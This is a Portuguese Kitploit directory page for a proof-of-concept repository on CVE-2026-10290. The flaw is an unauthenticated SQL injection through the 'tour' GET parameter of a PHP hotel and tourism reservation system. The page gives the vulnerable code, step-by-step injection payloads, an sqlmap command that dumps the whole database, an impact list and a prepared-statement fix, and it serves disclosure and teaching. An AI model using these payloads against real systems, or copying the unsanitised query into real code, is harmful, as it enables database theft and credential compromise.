Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-10290-SQLI — Prova de conceito para injeção de SQL não autenticada no Hotel and Tourism Reservation System 1.0, demonstrando extração de banco de dados via parâmetro tour. | Kitploit
Ferramentas/GitHubGitHub/xmyronn/cve-2026-10290-sqli
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

Prova de conceito para injeção de SQL não autenticada no Hotel and Tourism Reservation System 1.0, demonstrando extração de banco de dados via parâmetro tour.

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de Reservas de Hotel e Turismo - Injeção SQL Não Autenticada em tour.php

Detalhes da Vulnerabilidade

CampoDetalhes
TítuloSistema de Reservas de Hotel e Turismo - Injeção SQL via Parâmetro GET tour
Fornecedorcode-projects.org
URL do Fornecedorhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
ProdutoSistema de Reservas de Hotel e Turismo
Versão1.0
Tipo de VulnerabilidadeInjeção SQL
CWECWE-89
Pontuação CVSS9.8 (Crítico)
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Arquivo Afetado/ht/tour.php
Parâmetro Afetadotour (GET)
Autenticação NecessáriaNão
Explorável RemotamenteSim
PesquisadorSyed Imad Uddin Alvi

Descrição

Existe uma vulnerabilidade crítica de Injeção SQL no parâmetro GET tour do arquivo tour.php no Sistema de Reservas de Hotel e Turismo 1.0. O parâmetro é passado diretamente para uma consulta SQL bruta sem qualquer sanitização, sem prepared statements e sem validação de entrada. Um atacante remoto não autenticado pode manipular a consulta para extrair, modificar ou excluir quaisquer dados no banco de dados. A vulnerabilidade foi confirmada por um dump completo do banco de dados usando o sqlmap.

Código vulnerável em tour.php:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID é obtido diretamente de $_GET['tour'] e interpolado na consulta SQL sem qualquer sanitização.


Passos para Reproduzir

Configuração: Instale o Sistema de Reservas de Hotel e Turismo 1.0 no XAMPP e acesse em http://<alvo>/ht/

Passo 1 — Visite qualquer página de tour como um usuário não autenticado:

root@kitploit:~
http://<alvo>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

Passo 2 — Injete uma aspa simples para quebrar a consulta SQL e confirmar a vulnerabilidade:

root@kitploit:~
http://<alvo>/ht/tour.php?tour='

Resultado: Um erro fatal do MySQL é exibido — confirmando que a entrada não sanitizada alcança a consulta SQL.

Screenshot 2026-05-12 001643

Passo 3 — Confirme o SQLi com um payload baseado em booleano:

root@kitploit:~
http://<alvo>/ht/tour.php?tour=' or 1=1 -- -

Resultado: A página carrega normalmente com dados do tour — injeção booleana bem-sucedida.

Screenshot 2026-05-12 001654

Passo 4 — Faça o dump de todo o banco de dados usando o sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

Resultado: O sqlmap despeja com sucesso todas as tabelas em hotel_db, incluindo users, rooms, tour_reserves, gallery — comprometimento completo do banco de dados confirmado.

Screenshot 2026-05-12 001722

Impacto

Um atacante remoto não autenticado pode:

  • Extrair todos os dados do banco de dados, incluindo credenciais de usuário, e-mails, números de telefone e detalhes de reservas
  • Burlar a autenticação extraindo credenciais de administrador
  • Modificar ou excluir quaisquer registros do banco de dados
  • Potencialmente alcançar Execução Remota de Código via INTO OUTFILE se privilégios de arquivo forem concedidos

Causa Raiz

O parâmetro GET tour é interpolado diretamente em uma consulta SQL bruta sem o uso de prepared statements, consultas parametrizadas ou sanitização de entrada:

root@kitploit:~
// VULNERÁVEL
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// CORRIGIDO — use prepared statements
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

Referências

  • CWE-89: Falha na Neutralização de Elementos Especiais em um Comando SQL
  • OWASP: Injeção SQL
  • Sistema de Reservas de Hotel e Turismo — code-projects.org

Descoberto Por

Syed Imad Uddin Alvi — Pesquisador de Segurança Independente

Baixar ferramenta